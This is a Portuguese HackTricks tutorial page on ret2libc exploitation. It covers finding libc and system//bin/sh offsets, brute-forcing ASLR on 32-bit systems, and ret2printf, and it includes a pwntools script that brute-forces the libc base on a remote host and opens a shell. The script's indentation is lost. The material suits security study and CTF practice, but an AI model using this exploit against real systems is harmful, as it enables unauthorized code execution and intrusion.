Ret2lib

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Informação Básica

A essência do Ret2Libc é redirecionar o fluxo de execução de um programa vulnerável para uma função dentro de uma biblioteca compartilhada (por exemplo, system, execve, strcpy) em vez de executar shellcode fornecido pelo atacante na stack. O atacante cria um payload que modifica o endereço de retorno na stack para apontar para a função da biblioteca desejada, ao mesmo tempo que organiza para que quaisquer argumentos necessários sejam configurados corretamente de acordo com a convenção de chamadas.

Exemplo de passos (simplificado)

  • Obter o endereço da função a ser chamada (ex.: system) e o comando a ser executado (ex.: /bin/sh)
  • Gerar uma ROP chain para passar o primeiro argumento apontando para a string do comando e direcionar o fluxo de execução para a função

Finding the addresses

  • Supondo que a libc usada seja a do sistema atual, você pode encontrar onde ela será carregada na memória com:
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

Se você quiser verificar se o ASLR está alterando o endereço da libc, você pode fazer:

for i in `seq 0 20`; do ldd ./<bin> | grep libc; done
  • Sabendo a libc usada, também é possível encontrar o offset para a função system com:
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  • Sabendo qual libc é utilizada, também é possível encontrar o offset para a string /bin/sh com:
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Usando gdb-peda / GEF

Sabendo qual libc é usada, também é possível usar Peda ou GEF para obter o endereço da função system, da função exit e da string /bin/sh :

p system
p exit
find "/bin/sh"

Usando /proc/<PID>/maps

Se o processo estiver criando children toda vez que você se comunica com ele (network server) tente read esse arquivo (provavelmente você precisará ser root).

Aqui você pode encontrar exatamente onde a libc é carregada dentro do processo e onde ela será carregada para cada children do processo.

Neste caso está carregada em 0xb75dc000 (Este será o endereço base da libc)

Libc desconhecida

Pode ser que você não saiba qual libc o binário está carregando (porque pode estar em um servidor ao qual você não tem acesso). Nesse caso você pode abusar da vulnerabilidade para leak alguns endereços e descobrir qual libc está sendo usada:

Leaking libc address with ROP

E você pode encontrar um template pwntools para isso em:

Leaking libc - template

Identificar libc com 2 offsets

Consulte a página https://libc.blukat.me/ e use alguns endereços de funções dentro da libc para descobrir a versão usada.

Contornando ASLR em 32 bits

Esses ataques de brute-forcing são úteis apenas para sistemas 32bit.

  • Se o exploit for local, você pode tentar brute-force o endereço base da libc (útil para sistemas 32bit):
for off in range(0xb7000000, 0xb8000000, 0x1000):
  • Se estiver atacando um servidor remoto, você pode tentar brute-force the address of the libc function usleep, passando como argumento 10 (por exemplo). Se em algum momento o servidor demorar 10s a mais para responder, você encontrou o endereço dessa função.

One Gadget

Execute um shell apenas saltando para um específico endereço na libc:

One Gadget

x86 Ret2lib Code Example

Neste exemplo, o ASLR brute-force está integrado no código e o binário vulnerável está localizado em um servidor remoto:

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE, could be address of exit()
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive()

x64 Ret2lib Code Example

Confira o exemplo em:

ROP & JOP

ARM64 Ret2lib Example

No caso de ARM64, a instrução ret salta para onde o registrador x30 está apontando e não para onde o registrador de stack está apontando. Então é um pouco mais complicado.

Além disso, em ARM64 uma instrução faz exatamente o que a instrução faz (não é possível saltar no meio de instruções e transformá-las em novas).

Confira o exemplo em:

Ret2lib + Printf leak - arm64

Ret-into-printf (or puts)

Isso permite leak informações do processo chamando printf/puts com alguns dados específicos colocados como argumento. Por exemplo, colocar o endereço de puts no GOT como argumento de uma execução de puts irá leak o endereço de puts na memória.

Ret2printf

Isso basicamente significa abusar de uma Ret2lib para transformá-la em uma printf format strings vulnerability usando o ret2lib para chamar printf com os valores para explorá-la (parece inútil, mas é possível):

Format Strings

Other Examples & references

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks